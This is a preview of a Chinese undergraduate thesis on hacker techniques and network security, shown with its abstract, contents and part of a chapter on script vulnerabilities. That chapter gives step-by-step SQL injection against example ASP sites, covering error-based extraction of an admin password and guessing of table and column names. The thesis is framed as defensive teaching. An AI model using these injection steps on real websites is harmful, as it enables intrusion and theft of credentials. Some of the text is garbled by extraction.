毕业论文 黑客技术与网络安全.doc
《毕业论文 黑客技术与网络安全.doc》由会员分享,可在线阅读,更多相关《毕业论文 黑客技术与网络安全.doc(47页珍藏版)》请在三一办公上搜索。
1、 黑客技术与网络安全专 业 名 称: 计算机科学与技术 年 级 班 别: 061 姓 名: 指 导 教 师: 20010 年 5 月摘要计算机网络是现代通信技术与计算机技术相结合的产物。计算机网络把分布在不同地理区域的计算机与专门的外部设备用通信线路互连成一个规模大、功能强的网络系统,从而使众多的计算机可以方便地互相传递信息,共享硬件、软件、数据信息等资源。但是,就是由于这些方便给我们带来了巨大的隐患-由于黑客攻击带来的网络安全问题,使我们的信息和数据甚至国家的政治、经济、社会、和军事存在安全安全隐患。本文主要研究一些最近网络上黑客攻击手法,介绍他们攻击的原理,并针对他们攻击的方式提出抵制其的
2、方法。用来提高大家的网络安全防范能力和安全防范意识,使人们在使用电脑的时候有一个安全健康的网络环境,也是自己对自己的一些重要信息放心。但是,可能由于时间的不足,收集的质料太少,有一些地方没有提到,论文有许多的不足,我会多多收集这方面的质料多考虑这些不足来使自己的文章达到更加的完善。关键词:黑客;黑客技术;网络;网络安全ABSTRACTWith the development of the hacker technology, network security technology engendered.when we work on the network security ,we must
3、research the invaded method and the striking technology of the hacker.So, this article mainly studies on hacking techniques to explain network security, mainly to expose the principle of hacking attack means should be introduced with safety precautions. Attack by many examples and examples of preven
4、tion network security people to grasp the basic prevention techniques to understand the principles and methods of hacking and the harm so as to improve the awareness of network security and enhanced network security capabilities.This article mainly to some recent research network, theyre got to the
5、attack, and they strike to boycott the way. to improve the preventive capacity of the network security and safety awareness and to the computer is a safe environment, health network is also to some important information. however, that may be due to the time of collection of quality, there are some p
6、oints was not mentioned, the essay has manyKeywords: hacker; hacker technology; network;Network Security目 录1 绪论51.1引言51.2 内容框架52 脚本漏洞72.1 脚本漏洞的形成原因72.2脚本漏洞之黑客工具的分析92.3 脚本漏洞的危害142.4 Asp脚本漏洞的安全防范192.5PHP注入原理262.6PHP实例272.7注入的安全防范292.8其它脚本漏洞313网络嗅探与缓冲区溢出293.1 缓冲区溢出293.2网络嗅探314 个人PC机安全344.1 木马原理344.2 网页
7、木马354.3 病毒364.4 漏洞385 黑客最新手段及防范415.1 网站旁注415.2 密码破解425.3 社会工程学449 总结46参考文献47致谢48黑客技术与网络安全1 绪论随着计算机网络技术的飞速发展,互联网已经深入到社会的方方面面,它对人们的工作方式、生活方式甚至思维方式都产生了巨大影响。毫不夸张地说,互联网已经成为现代人生活中不可或缺的一部分。然而,人们在享受互联网所带来的愉悦的同时,也不可避免地受到一系列黑客的攻击和网络问题的困扰:网络上的大量虚假、非法信息,病毒日益猖狂,黑客攻击无孔不入这些都严重危及到了个人、企事业单位乃至国家的信息安全。所以,研究如何采取有效措施来保护
8、自己的重要信息变得越来越有必要,本文就是在这样一个大背景下编撰而成的。本文系统介绍了黑客技术的基础理论,从而保护自己的网络安全。在内容安排上,将理论知识和实际应用有机结合,力求在全面、系统介绍黑客技术的基本原理及应用的同时,让我们能更好的保护我们的网络安全进行一个全面、清晰的了解。1.1引言计算机网络是现代通信技术与计算机技术相结合的产物。所谓计算机网络,就是把分布在不同地理区域的计算机与专门的外部设备用通信线路互连成一个规模大、功能强的网络系统,从而使众多的计算机可以方便地互相传递信息,共享硬件、软件、数据信息等资源。从世界上第一台计算机诞生到今天互联网的日益普及,计算机的发展速度可谓突飞猛
9、进,从而也把人类文明带入数码时代。计算机网络的出现,使人们在获取和传递信息时,又多了一种选择,而且是一种能够提供空前“自由化”的选择,它使信息的传播速度、质量与范围在时间和空间上有了质的飞跃,从而使人们的许多梦想变成了现实。但是,辩证唯物主义认为,任何事物都是矛盾对立的统一体,尤其是对于正在发展中的新事物来说,更是如此。计算机网络也不例外。人们在享受着网络传输带给我们便利的同时,也对日露端倪的网络负面影响愈发担忧。开放的信息系统必然存在众多潜在的安全隐患,黑客和反黑客、破坏和反破坏的斗争仍将继续。在这样的斗争中,安全技术作为一个独特的领域越来越受到全球网络建设者的关注。随着网上的在线交易、互联
10、星空冲值、网络游戏的发展、电子商务的发展,网络安全越来越关系着广大用户的切身利益。目前网络在世界经济社会中占据着越来越重要的地位,已经不只为了信息和数据的安全,甚至已经渗透到国家的政治、经济、社会、和军事之中。网络黑客,始终给人们蒙上了一层神秘的面纱,其实他们只不过是一群计算机技术的狂热爱好者,仅仅是利用了自己的技术技巧以及系统的漏洞和用户的弱点。本文主要批露目前流行的黑客攻击技术、揭露黑客技术的原理、介绍针对攻击的安全防范方法,用来提高大家的网络安全防范能力和安全防范意识。1.2内容框架我写的论文主要是通过对黑客技术的介绍来让大家了解黑客攻击的方式。攻与防是分不开的,我们只有在了解其攻击方式
11、和原理后,才能真正更好的防御。本文主要分为两个大体内容:网站服务器安全和个人pc机安全,其中网站服务器安全主要介绍各种网站服务器的入侵方式和防范方法:如脚本漏洞入侵、网络旁注、远程溢出、网络嗅探、社会工程学、ddos拒绝服务攻击等个人pc机安全:主要讲叙黑客入侵个人机常用的方法及防范,如木马技术、溢出、弱口令扫描、ipc管道、以及黑客到底想用我们的个人机干什么。2脚本漏洞2.1脚本漏洞的形成原因 随着网络经济的复舒,开始越来越多的网站涌现出来,随着脚本漏洞的挖掘,黑客也越来越猖狂,并且越来越低龄化和傻瓜化。“你只要会用一个工具就可以黑站”,这就是脚本漏洞利的特点。这些漏洞的主要成因是编程程序员
12、的素质,往往在编写asp或php等程序时候对字符的过滤不严密,对注入漏洞不了解,或者某个参数忘记检查导致的。由于编写网页程序这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。我们看一个例子:在本机建一个基于iis的asp程序http:/localhost/test/show
13、.asp?ID=3,将这个网址提交到服务器后,服务器将进行类似Select * from 表名 where 字段=&ID的查询(ID即客户端提交的参数,本例即是3),再将查询结果返回给客户端,如果这里客户端故意提交这么一个网址:http:/localhost/test/show.asp?ID=3 and user0,这时,服务器运行Select * from 表名 where 字段=444 and user0这样的查询,当然,这个语句是运行不下去的,肯定出错,错误信息如下:错误类型:Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)M
14、icrosoftODBC SQL Server DriverSQL Server将 nvarchar 值 test 转换为数据类型为 int 的列时发生语法错误。/test/show.asp, 第 34 行从这个出错信息中,我们可以获得以下信息:该站使用MSSQL数据库,用ODBC连接,连接帐号名为:test。所谓SQL注入,就是利用程序员对用户输入数据的合法性检测不严或不检测的特点,故意从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取想得到的资料。通常别有用心者的目标是获取网站管理员的帐号和密码。比如当知道网站管理员帐号存在表login中,管理员帐号名为admin 想知道admi
15、n的密码,这里接着从客户端提交这样一个网址:http:/localhost/test/show.asp?ID=4 and (Select password from login where user_name=admin)0,返回的出错信息如下:错误类型:Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)MicrosoftODBC SQL Server DriverSQL Server将 varchar 值 admin888 转换为数据类型为 int 的列时发生语法错误。/test/show.asp, 第 34 行现在出来了“admi
16、n888”就是管理员的密码!得到这个密码,这时您就可以用这个帐号和密码接管人家的网站了!当然我们并不知道帐号就在表login中,而且也不知道管理员名为admin,但这些不容难办到,可以写个工具进行猜解,速度很快就可以找到你想要的东西了。前面是有关mssql数据库的注入基础,现在再看一看acceess数据库的注入基础:首先进行浏览器的设置,以保证手工注入时能返回出错信息。其操作步骤为:右键单击浏览器图标,选择“属性”,在弹出来的对话框中选择“高级”选项卡,接着去掉“显示友好的HTTP错误信息”前面的钩,最后点击“应用”按钮即可。对于sql注入得先找到注入点,注入点的判断方法为:通常打开一个类似如
17、果出现错误提示,则说明可能存在注入漏洞,再输入 and 1=1如果存在SQL注入漏洞,就可以查询数据库,1=1是一个恒等式可以忽略,因此会返回一个正常的页面,此页面和 and 1=2,1=2为一个恒不等式,如果该站点支持数据库查询,则大概会返回如下所示的信息:Microsoft vbscript 编译器错误 错误码率 800a03f6 缺少End/iishelp/common/500-100.asp,行242ADODB.Field 错误 800a0bcd一般出现以上信息就可以确定存在sql注入漏洞了。下面看一下sql注入的过程分析:如:打开:http:/hostlocal/test2/list
18、.asp?id=17在其后面加为http:/hostlocal/test2/list.asp?id=17出错!显示为:“数据库出错”。那么接下来我们便进行如下操作:1猜管理员的表:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin)/min(id)返回表中ID最小值返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。2猜用户的字段名:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin w
19、here user=aaa)返回错误信息,表示没有user这个用户段,再来:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where username=aaa)没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username字段,只是用户名不是aaa3猜密码的字段名:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where passwd=aaa)返回错误信息表示没有passwd这个密码
20、字段名。再来:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where password=aaa)没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是aaa4猜用户字段名长度: http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)5)正确;http:/hostlocal/test2/list.asp?id=17 and
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 毕业论文 黑客技术与网络安全 黑客技术 网络安全
链接地址:https://www.31ppt.com/p-2401923.html